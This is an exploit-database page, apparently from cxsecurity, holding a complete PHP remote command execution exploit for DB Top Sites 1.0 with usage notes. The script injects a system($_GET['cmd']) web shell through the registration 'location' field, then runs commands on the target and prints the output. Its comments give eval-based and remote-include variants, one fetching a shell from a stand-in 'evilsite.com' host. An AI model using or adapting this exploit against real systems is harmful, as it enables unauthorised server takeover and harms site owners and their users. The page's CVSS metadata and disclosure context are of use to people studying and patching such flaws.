DB Top Sites 1.0 Remote Command Execution Exploit

2009.06.22
Credit: SirGod
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<?php /* ------------------------------------------------------------ [+] About DB Top Sites v1.0 Remote Command Execution Exploit Script homepage : http://www.jnmsolutions.co.uk/topsites/ Author : SirGod Thanks to : Nytro Website : www.mortal-team.org ------------------------------------------------------------ [+] Usage Upload the file to an webhost and access it. Site : the target website (WITH TRAILING SLASH) Command : the command that you want to execute Click Execute.The command output will be diplayed. After you executed the exploit once,the file can't be replaced ( because the exploit create it by registering ) and just hit the link in the top of the page and go back to execute another command. ------------------------------------------------------------ [+] Explanation Lets take a look in add_reg.php Lines 14 - 22 ---------------------------------- $user = $_POST['user']; $pass1 = $_POST['pass1']; $pass2 = $_POST['pass2']; $email1 = $_POST['email1']; $email2 = $_POST['email2']; $location = $_POST['location']; $url = $_POST['url']; $filename = "./sites/".$user.".php"; ----------------------------------- We can see that the script creates a php file ( username.php ), in our case,pwned.php.The script save all the user data in that file so we can inject our evil code into one field ( I chosen the location field. Lines 112 - 121 ---------------------------------- $html = "<?php \$regdate = \"$date\"; \$user = \"$user\"; \$pass = \"$pass1\"; \$email = \"$email1\"; \$location = \"$location\"; \$url = \"$url\"; ?>"; $fp = fopen($filename, 'a+'); fputs($fp, $html) or die("Could not open file!"); --------------------------------- We see how data is added in the file,the variables including our evil code. So if we register as an user with the location : \";?><?php system(\$_GET['cmd']);?><?php \$xxx=\":D the code inside the php file ( pwned.php ) will look like this : ---------------------------------- <?php $regdate = "13 June 2009, 4:16 PM"; $user = "pwned"; $pass = "pwned"; $email = "pwned@yahoo.com"; $location = "";?><?php system($_GET['cmd']);?><?php $xxx=":D"; $url = "http://pwned.com";$plm=":)"; ?> --------------------------------- So we can succesfully execute our commands. ------------------------------------------------------------ [+] Notes You can change my PHP code ( $codphp ) with what you want. Example : $codphp = "\";?><?php eval(\$_GET['cmd']);?><?php \$xxx=\":D"; And you will be able to execute PHP code. Example 2 : $codphp = "\";?><?php include "http://evilsite.com/evilscript.txt";?><?php \$xxx=\":D"; To include your evil script (shell). Session is used to verify if the exploit was launched previously and if was launched previously the exploit will NOT try anymore to create the file and will let you to execute your commands. ------------------------------------------------------------ */ session_start(); error_reporting(0); if(isset($_POST['submit'])) { if(!isset($_SESSION['done'])) { $codphp = "\";?><?php system(\$_GET['cmd']);?><?php \$xxx=\":D"; define('POSTVARS','user=pwned&pass1=pwned&pass2=pwned&email1=pwned@yahoo.com&email2=pwned@yahoo.com&url=http://pwned.com";$plm=":)&location='.$codphp); $site = $_POST['site']; $ch = curl_init($site . "add_reg.php"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, POSTVARS); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($ch); $_SESSION['done'] = 1; } $site = $_POST['site']; $result = file_get_contents($site . "sites/pwned.php?cmd=" . $_POST['cmd']); print "<a href=\"javascript:history.back();\">Click here to go back and execute another command</a><br /><br />"; print "Command result: <br /><br />" . nl2br($result) . "<br /><br />"; } else { ?> <form method="post"> Site: <input type="text" name="site" value="http://127.0.0.1/path/" /><br /> Command: <input type="text" name="cmd" value="whoami" /><br /><br /> <input type="submit" name="submit" value="Execute" /> </form> <?php } ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top